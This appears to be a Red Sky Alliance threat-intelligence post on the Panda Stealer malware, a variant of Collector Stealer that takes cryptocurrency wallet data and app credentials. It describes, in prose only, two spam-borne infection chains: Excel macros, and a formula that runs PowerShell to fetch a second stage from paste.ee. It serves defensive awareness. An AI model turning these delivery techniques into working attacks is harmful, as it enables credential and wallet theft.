Do you know where your Bitcoins are Today?

8989703898?profile=RESIZE_400xA new information stealer is going after cryptocurrency wallets and credentials for applications including NordVPN, Telegram, Discord, and Steam.   Panda Stealer malware uses spam emails and the same hard-to-detect fileless distribution method deployed by a recent Phobos ransomware campaign discovered by investigators.

The attack campaign appears to be primarily targeting users in Australia, Germany, Japan, and the United States.  Panda Stealer was discovered by Trend Micro at the beginning of April 2021. Threat researchers have identified two infection chains being used by the campaign.  Analysts said: "In one, an .XLSM attachment contains macros that download a loader, then the loader downloads and executes the main stealer. 

"The other infection chain involves an attached .XLS file containing an Excel formula that utilizes a PowerShell command to access paste.ee, a Pastebin alternative, that accesses a second encrypted PowerShell command."  Once installed, Panda Stealer can collect details like private keys and records of past transactions from its victim’s various digital currency wallets, including Dash, Bytecoin, Litecoin, and Ethereum.

Panda has other uses, such as the ability to take screenshots of the infected computer and the power to exfiltrate data from browsers, like cookies, passwords, and cards.  Researchers linked the campaign to an IP address assigned to a virtual private server rented from Shock Hosting. Shock Hosting said that the server assigned to this address has been suspended. 

Panda Stealer was determined to be a variant of Collector Stealer, cracked by Russian threat actor NCP, also known as su1c1de.   "Because the cracked Collector Stealer builder is openly accessible online, cybercriminal groups and script kiddies alike can use it to create their own customized version of the stealer and C&C panel," noted researchers.  CollectorStealer (also known as DCStealer) is malicious software which allows cyber criminals to steal various sensitive information (e.g. passwords, credit card details) and files. This malware is for sale on a hacker forum for $12 or $75 (depending on the subscription type). It is advertised on the aforementioned forum as a "top-end information stealer" with a Russian interface.

While the stealers behave similarly, they have different command and control server URLs, build tags, and execution folders.  When analyzing the different types of attacks analysts detected across seven million enterprise endpoints over the last 12 months.   Researchers found that infostealers made up the highest percentage of attempted endpoint attacks (31%). 

Red Sky Alliance has been has analyzing and documenting cyber threats and groups for over 9 years and maintains a resource library of malware and cyber actor reports available at https://redskyalliance.org at no charge. Many past tactics are reused in current malicious campaigns.

To protect your own supply chain, consider subscribing to RedXray, Red Sky Alliance’s cyber threat notification service.  Details can be found at:  https://www.wapacklabs.com/redxray.


Red Sky Alliance is a Cyber Threat  Analysis  and  Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@wapacklabs.com 


Weekly Cyber Intelligence Briefings:


Reporting:   https://www.redskyalliance.org/
Website:  https://www.wapacklabs.com/
LinkedIn:    https://www.linkedin.com/company/64265941 


Weekly Cyber Intelligence Briefings:


REDSHORTS - Weekly Cyber Intelligence Briefings
https://attendee.gotowebinar.com/register/3702558539639477516

 

TR-21-146-001_Bitcoin.pdf

 

https://www.infosecurity-magazine.com/news/panda-stealer-targets-crypt

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!